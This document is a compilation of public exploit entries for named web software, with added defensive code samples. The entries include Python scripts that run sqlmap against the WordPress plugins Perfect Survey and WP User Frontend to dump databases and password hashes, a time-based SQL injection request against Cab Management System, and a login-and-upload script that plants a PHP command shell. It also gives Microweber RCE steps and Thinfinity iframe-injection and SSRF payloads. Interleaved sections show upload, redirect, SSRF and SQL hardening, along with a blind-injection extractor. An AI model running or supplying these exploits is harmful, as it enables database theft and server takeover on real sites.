  19. # Exploit Title: WordPress Plugin Perfect Survey - 1.5.1 - SQLi (Unauthenticated) # Date 18.02.2022 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.getperfectsurvey.com/ # Software Link: https://web.archive.org/web/20210817031040/https://downloads.wordpress.org/plugin/perfect-survey.1.5.1.zip # Version: < 1.5.2 # Tested on: Ubuntu 20.04 # CVE: CVE-2021-24762 # CWE: CWE-89 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24762/README.md ''' Description: The Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection. ''' banner = ''' ___ _ _ ______ ____ ____ ____ ___ ____ _ _ _______ _____ ____ _(___)_ (_) (_)(______) _(____) (____) _(____) (___) _(____)(_) (_)(_______)(_____) _(____) (_) (_)(_) (_)(_)__ ______(_) _(_)(_) (_)(_) _(_)(_)(_) ______(_) _(_)(_)__(_)_ _(_)(_)___ (_) _(_) (_) _ (_) (_)(____)(______) _(_) (_) (_) _(_) (_)(______) _(_) (________)_(_) (_____)_ _(_) (_)___(_) (_)_(_) (_)____ (_)___ (_)__(_) (_)___ (_) (_)___ (_) (_) (_)___(_)(_)___ (___) (___) (______) (______) (____) (______) (_) (______) (_)(_) (_____)(______) [+] Perfect Survey - SQL Injection [@] Developed by Ron Jost (Hacker5preme) ''' print(banner) import argparse from datetime import datetime import os # User-Input: my_parser = argparse.ArgumentParser(description= 'Perfect Survey - SQL-Injection (unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S'))) print('[*] Payload for SQL-Injection:') exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + 
r'wp-admin/admin-ajax.php?action=get_question&question_id=1 *" ' print(' Sqlmap options:') print(' -a, --all Retrieve everything') print(' -b, --banner Retrieve DBMS banner') print(' --current-user Retrieve DBMS current user') print(' --current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
  20. # Exploit Title: Cab Management System 1.0 - 'id' SQLi (Authenticated)
      # Exploit Author: Alperen Ergel
      # Contact: @alpernae (IG/TW)
      # Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html
      # Version : 1.0
      # Tested on: windows 10 xammp | Kali linux
      # Category: WebApp
      # Google Dork: N/A
      # Date: 18.02.2022

      ######## Description ########
      #
      # Authenticate and go to "update client settings"; the id parameter
      # will appear there. Put your payload in it and it'll work.
      #

      ######## Proof of Concept ########

      ========>>> REQUEST <<<=========

      GET /cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1
      Host: localhost
      sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
      sec-ch-ua-mobile: ?0
      sec-ch-ua-platform: "Windows"
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      Accept-Encoding: gzip, deflate
      Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
      Cookie: PHPSESSID=m1s7h9jremg0vj7ipk9m05n1nt
      Connection: close
21. # Exploit Title: Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: NA
# Date: 02/17/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://microweber.org/
# Software Link: https://github.com/microweber/microweber
# Version: 1.2.11
# Tested on: [KALI OS]
# CVE : CVE-2022-0557
# Reference : https://huntr.dev/bounties/660c89af-2de5-41bc-aada-9e4e78142db8/

# Steps To Reproduce
- Log in using admin credentials.
- Navigate to the User section, then Add/Modify Users.
- Change/add the profile image and select a crafted image file.
- A crafted image file is an image file that carries PHP code for execution.
- The file extension of the crafted file is PHP7, e.g. "Sample.php7".
- Path of the uploaded crafted shell: https://localhost/userfiles/media/default/shell.php7
22. # Exploit Title: Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html
# Version : 1.0
# Tested on: Windows 10 XAMPP | Kali Linux
# Category: WebApp
# Google Dork: N/A
# Date: 18.02.2022

######## Description ########
#
# Step 1: Log in to the admin account and go to the site settings
# Step 2: Update the web site icon and select a webshell.php
# Step 3: Upload your webshell, that's it...
#

######## Proof of Concept ########

========>>> START REQUEST <<<=========

POST /cms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Content-Length: 11338
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/cms/admin/?page=system_info
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=samlsgsrh4iq50eqc1qldpthml
Connection: close

<-- SNIP HERE -->
------WebKitFormBoundaryc5vp1oayEolowCbb
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryc5vp1oayEolowCbb
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryc5vp1oayEolowCbb--
<-- SNIP HERE -->

========>>> END REQUEST <<<=========

========>>> EXPLOIT CODE <<<=========

import os
import requests

print("""
--------------------------------------------
|                                          |
|  Author: Alperen Ergel (@alpernae)       |
|                                          |
|  CAB Management System v1 Exploit        |
|                                          |
--------------------------------------------
""")

username = input("Username: ")
password = input("Password: ")
URL = input("Domain: ")

# One session, so the PHPSESSID cookie set by the login is sent with the upload
session = requests.Session()
headers = {
    "Accept": "*/*",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36",
    "Origin": "http://" + URL,
    "Referer": "http://" + URL + "/cms/admin/login.php",
}

# Step 1: authenticate as admin
login_url = "http://" + URL + "/cms/classes/Login.php?f=login"
session.post(login_url, headers=headers, data={"username": username, "password": password})

# Step 2: upload the web shell through the site icon ("img") field of update_settings
FILE = input("File: ")
with open(FILE, "rb") as fh:
    shell = fh.read()

upload_url = "http://" + URL + "/cms/classes/SystemSettings.php?f=update_settings"
headers["Referer"] = "http://" + URL + "/cms/admin/?page=system_info"
form = {
    "name": "Cab Management System",
    "short_name": "CMS - PHP",
    "content[welcome]": "<p>test</p>",
    "content[about]": "<p>test</p>",
}
files = {
    "img": (os.path.basename(FILE), shell, "application/octet-stream"),
    "cover": ("", b"", "application/octet-stream"),
}
resp = session.post(upload_url, headers=headers, data=form, files=files)
print(resp.status_code, resp.text)
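Both the Microweber post (item 21, a ".php7" file accepted as a profile image) and the Cab Management System post (item 22, "shell.php" accepted as the site icon) come down to an upload handler that trusts the client-supplied file name. The following is an added example, not code from either project: a Python sketch of the extension denylist such handlers typically rely on, next to an allowlist plus content check that also discards the client's name. The accepted formats, magic bytes and helper names are assumptions made for the example.

```python
import os
import secrets

# Image formats the application actually needs (assumption for this example)
ALLOWED_IMAGE_EXT = {"png", "jpg", "jpeg", "gif", "ico"}

# Leading bytes for each accepted format; the declared extension must match the content
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "ico": b"\x00\x00\x01\x00",
}

# The kind of denylist many PHP apps ship with; included only to show how it fails
DENYLIST = {"php", "php3", "php4", "php5", "phtml"}


def extension_of(filename):
    """Lower-cased last extension of the client-supplied name, or '' if it has none."""
    base = os.path.basename(filename.replace("\\", "/"))
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def denylist_allows(filename):
    """Denylist check: anything not explicitly listed gets through, e.g. '.php7'."""
    return extension_of(filename) not in DENYLIST


def accept_upload(filename, content):
    """Allowlist + content check. Returns (accepted, stored_name_or_reason).

    The stored name is random and generated server-side, so the client never
    controls the extension or the path of what ends up on disk.
    """
    ext = extension_of(filename)
    if ext not in ALLOWED_IMAGE_EXT:
        return False, "extension not in allowlist: %r" % ext
    if not content.startswith(MAGIC[ext]):
        return False, "content does not match declared type"
    return True, "%s.%s" % (secrets.token_hex(16), ext)


if __name__ == "__main__":
    # Constructed sample payloads, not real uploads
    shell = b"<?php system($_REQUEST['cmd']); ?>"
    png = MAGIC["png"] + b"\x00" * 32
    for name, data in [("shell.php", shell), ("shell.php7", shell),
                       ("icon.png", shell), ("icon.png", png)]:
        print(name, "denylist:", denylist_allows(name), "allowlist:", accept_upload(name, data))
```

Validation alone is not the whole fix: the directory the file lands in (for Microweber, /userfiles/media/default/) must also be served with script execution disabled, or sit outside the web root, so that a file which slips through is still only ever returned as bytes.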
23. Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection
Date: 16/12/2021
Exploit Author: Daniel Morales
Vendor: https://www.cybelesoft.com
Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
Version: Thinfinity VirtualUI < v3.0
Tested on: Microsoft Windows
CVE: CVE-2021-45092

How it works
By accessing the following payload (URL) an attacker could iframe any external website (of course, only external endpoints that allow being iframed).

Payload
The vulnerable vector is "https://example.com/lab.html?vpath=//wikipedia.com", where "vpath=//" is the pointer to the external site to be iframed.

Vulnerable versions
It has been tested in VirtualUI versions 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0.

References
https://github.com/cybelesoft/virtualui/issues/2
https://www.tenable.com/cve/CVE-2021-45092
https://twitter.com/danielmofer
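The vpath value in the post above is protocol-relative: "//wikipedia.com" starts with a slash, so a check that only asks "does it begin with /" accepts it, and the browser resolves it to another origin. As an added example (not Thinfinity code; the function names and the fallback path are assumptions), this Python check accepts only a same-origin absolute path for use as a frame source and rejects the protocol-relative form, the backslash variant browsers normalise to it, full URLs and scheme-only values:

```python
from urllib.parse import urlsplit

DEFAULT_VPATH = "/index.html"  # assumed fallback for this example


def is_same_origin_path(value):
    """True only for an absolute path on the current origin, e.g. '/lab/page.html'.

    Rejects everything a browser would resolve to another origin when placed in
    an iframe src: full URLs, scheme-only values such as 'javascript:', the
    protocol-relative form '//host' used in the report, and '/\\host', which
    browsers normalise to '//host'.
    """
    if not value or not value.startswith("/"):
        return False
    # A path never legitimately carries raw control or whitespace characters;
    # some parsers strip them, which would turn '/\t/host' back into '//host'
    if any(ord(c) < 0x21 for c in value):
        return False
    if value[1:2] in ("/", "\\"):
        return False
    parts = urlsplit(value)
    # A path-only reference parses with neither scheme nor authority
    return parts.scheme == "" and parts.netloc == ""


def frame_target(vpath):
    """What the page should put in the iframe src for a client-supplied vpath."""
    return vpath if is_same_origin_path(vpath) else DEFAULT_VPATH


if __name__ == "__main__":
    for v in ["/lab/page.html", "//wikipedia.com", "/\\wikipedia.com",
              "https://wikipedia.com", "javascript:alert(1)", "/%2F%2Fwikipedia.com"]:
        print("%-28r -> %s" % (v, frame_target(v)))
```

Where the set of framable pages is known, an allowlist of exact paths is stricter still; the check above is the minimum that closes the vector the report describes.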
24. Exploit Title: Thinfinity VirtualUI 2.5.26.2 - Information Disclosure
Date: 18/01/2022
Exploit Author: Daniel Morales
Vendor: https://www.cybelesoft.com
Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
Version vulnerable: Thinfinity VirtualUI < v2.5.26.2
Tested on: Microsoft Windows
CVE: CVE-2021-46354

How it works
External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to leak the real IP of the web server or increase the attack surface (it may also be used to leak the real IP behind a CDN).

Payload
An example of the HTTP request:

"https://example.com/cmd?cmd=connect&wscompression=true&destAddr=domain.com&scraper=fmx&screenWidth=1918&screenHeight=934&fitmode=0&argumentsp=&orientation=0&browserWidth=1918&browserHeight=872&supportCur=true&id=null&devicePixelRatio=1&isMobile=false&isLandscape=true&supportsFullScreen=true&webapp=false"

Where "domain.com" is the external endpoint to be requested.

Vulnerable versions
It has been tested in VirtualUI versions 2.1.28.0, 2.1.32.1 and 2.5.26.2.

References
https://github.com/cybelesoft/virtualui/issues/3
https://www.tenable.com/cve/CVE-2021-46354
https://twitter.com/danielmofer
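The destAddr parameter above is a server-side connect target taken straight from the client, which is the general shape of an SSRF: the same channel that reaches "domain.com" also reaches loopback, link-local metadata services and internal hosts. As an added example (not Thinfinity code; the backend names, ports and function names are assumptions), this Python policy parses destAddr as a bare host[:port], requires the name to be on an allowlist, rejects IP literals, and provides a second gate for the addresses DNS returns at connect time:

```python
import ipaddress
from urllib.parse import urlsplit

# Assumptions for this example: the gateway may only connect to these backends and ports
ALLOWED_BACKENDS = {"app1.internal.example", "app2.internal.example"}
ALLOWED_PORTS = {443, 3389}
DEFAULT_PORT = 443


def parse_dest_addr(dest_addr):
    """Split a bare 'host', 'host:port' or '[v6]:port' into (host, port).

    Raises ValueError for anything that is not a bare endpoint (paths, userinfo,
    fragments, control characters, bad ports), so URL tricks cannot steer the parser.
    """
    if any(c in dest_addr for c in "/\\@?#") or any(ord(c) < 0x21 for c in dest_addr):
        raise ValueError("not a bare host[:port]")
    parts = urlsplit("//" + dest_addr)
    if not parts.hostname:
        raise ValueError("missing host")
    port = parts.port if parts.port is not None else DEFAULT_PORT  # .port raises on junk
    return parts.hostname, port


def is_internal_ip(ip_str):
    """True for addresses an outbound connector must never reach on a user's behalf."""
    ip = ipaddress.ip_address(ip_str)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # '::ffff:127.0.0.1' is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def destination_allowed(dest_addr):
    """Policy for destAddr: allowlisted name, allowlisted port, no raw IP literals."""
    try:
        host, port = parse_dest_addr(dest_addr)
    except ValueError:
        return False
    if port not in ALLOWED_PORTS:
        return False
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return host.lower() in ALLOWED_BACKENDS  # a name: must be on the allowlist
    return False  # an IP literal bypasses name-based policy; reject it outright


def resolved_addresses_allowed(addresses):
    """Second gate, applied to what DNS returned for an allowlisted name at connect time."""
    return bool(addresses) and not any(is_internal_ip(a) for a in addresses)


if __name__ == "__main__":
    for d in ["app1.internal.example", "domain.com", "127.0.0.1:443", "[::1]:443",
              "app1.internal.example:22", "app1.internal.example@127.0.0.1"]:
        print("%-36r -> %s" % (d, destination_allowed(d)))
    # Constructed resolver results, not a live lookup
    print(resolved_addresses_allowed(["93.184.216.34"]), resolved_addresses_allowed(["::ffff:127.0.0.1"]))
```

The second gate only helps if the connection is made to the address that was checked: resolve once, check the result, connect to that IP. Resolving again inside the connect call reopens the window for DNS rebinding.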
25. # Exploit Title: WordPress Plugin WP User Frontend 3.5.25 - SQLi (Authenticated)
# Date: 20.02.2022
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://wedevs.com/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-frontend.3.5.25.zip
# Version: < 3.5.25
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-25076
# CWE: CWE-89
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-25076/README.md

'''
Description:
The WP User Frontend WordPress plugin before 3.5.26 does not validate and escape the status parameter
before using it in a SQL statement in the Subscribers dashboard, leading to an SQL injection.
Due to the lack of sanitisation and escaping, this could also lead to Reflected Cross-Site Scripting.
'''

banner = '''
[+] WP User Frontend - SQL Injection
[@] Developed by Ron Jost (Hacker5preme)
'''
print(banner)

import argparse
from datetime import datetime
import os
import requests

# User-Input:
my_parser = argparse.ArgumentParser(description='WP User Frontend - SQL-Injection (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)   # initial GET so WordPress sets its test cookie

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)

# SQL-Injection (Exploit):
# Turn the authenticated session's cookies into the "k=v; k=v" string sqlmap expects
cookie = '; '.join(k + '=' + v for k, v in session.cookies.get_dict().items())
print('[*] Payload for SQL-Injection:')
exploitcode_url = r'sqlmap -u "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin.php?page=wpuf_subscribers&post_ID=1&status=1" '
exploitcode_risk = '--level 2 --risk 2 '
exploitcode_cookie = '--cookie="' + cookie + '" '
print('    Sqlmap options:')
print('    -a, --all           Retrieve everything')
print('    -b, --banner        Retrieve DBMS banner')
print('    --current-user      Retrieve DBMS current user')
print('    --current-db        Retrieve DBMS current database')
print('    --passwords         Enumerate DBMS users password hashes')
print('    --tables            Enumerate DBMS database tables')
print('    --columns           Enumerate DBMS database table column')
print('    --schema            Enumerate DBMS schema')
print('    --dump              Dump DBMS database table entries')
print('    --dump-all          Dump all DBMS databases tables entries')
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p status -v 0 --answers="follow=Y" --batch'
os.system(exploitcode)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))
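The Cab Management System "id" injection (item 20) and the WP User Frontend "status" injection (item 25) are the same defect: a request parameter spliced into SQL text. The following is an added example, not code from either project, built on an in-memory SQLite table constructed for the demonstration rather than either application's schema (table and column names are assumptions). It puts the concatenating pattern next to the parameterised one, and adds a small boolean-blind extractor that does by hand what the sqlmap step on this page automates, with "did a row come back" as the oracle. Item 20's SLEEP(10) payload is the time-based form of the same oracle for MySQL; SQLite has no SLEEP, so the example uses the boolean form.

```python
import sqlite3
import string


def make_db():
    """In-memory table standing in for the application's clients table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (id INTEGER PRIMARY KEY, name TEXT, phone TEXT)")
    conn.executemany("INSERT INTO clients VALUES (?, ?, ?)",
                     [(1, "alice", "555-0100"), (2, "bob", "555-0101"), (3, "carol", "555-0102")])
    return conn


def get_client_vulnerable(conn, client_id):
    """The pattern behind both advisories: the request parameter becomes part of the SQL text."""
    sql = "SELECT id, name, phone FROM clients WHERE id = '" + client_id + "'"
    return conn.execute(sql).fetchall()


def get_client_safe(conn, client_id):
    """Same query with a bound parameter: the value can never change the statement's shape."""
    return conn.execute("SELECT id, name, phone FROM clients WHERE id = ?", (client_id,)).fetchall()


def blind_extract(conn, subquery, max_len=32, charset=string.ascii_lowercase + string.digits + "-_"):
    """Recover the scalar result of `subquery` one character at a time through the
    vulnerable handler, using only "did a row come back" as the oracle.
    This is the manual version of what sqlmap does once it has confirmed the injection."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = "1' AND substr((%s),%d,1)='%s' AND '1'='1" % (subquery, pos, ch)
            if get_client_vulnerable(conn, payload):
                recovered += ch
                break
        else:
            break  # no character matched: the end of the value has been reached
    return recovered


if __name__ == "__main__":
    conn = make_db()
    tautology = "1' OR '1'='1"
    print("vulnerable:   ", get_client_vulnerable(conn, tautology))  # every row
    print("parameterised:", get_client_safe(conn, tautology))        # no row
    print("blind extract:", blind_extract(conn, "SELECT name FROM clients WHERE id=2"))
```

In the PHP applications on this page the equivalent of the "?" placeholder is a prepared statement with bound parameters (PDO::prepare or mysqli_prepare); escaping the value into the string is not an alternative, because it leaves the statement's shape under the client's control.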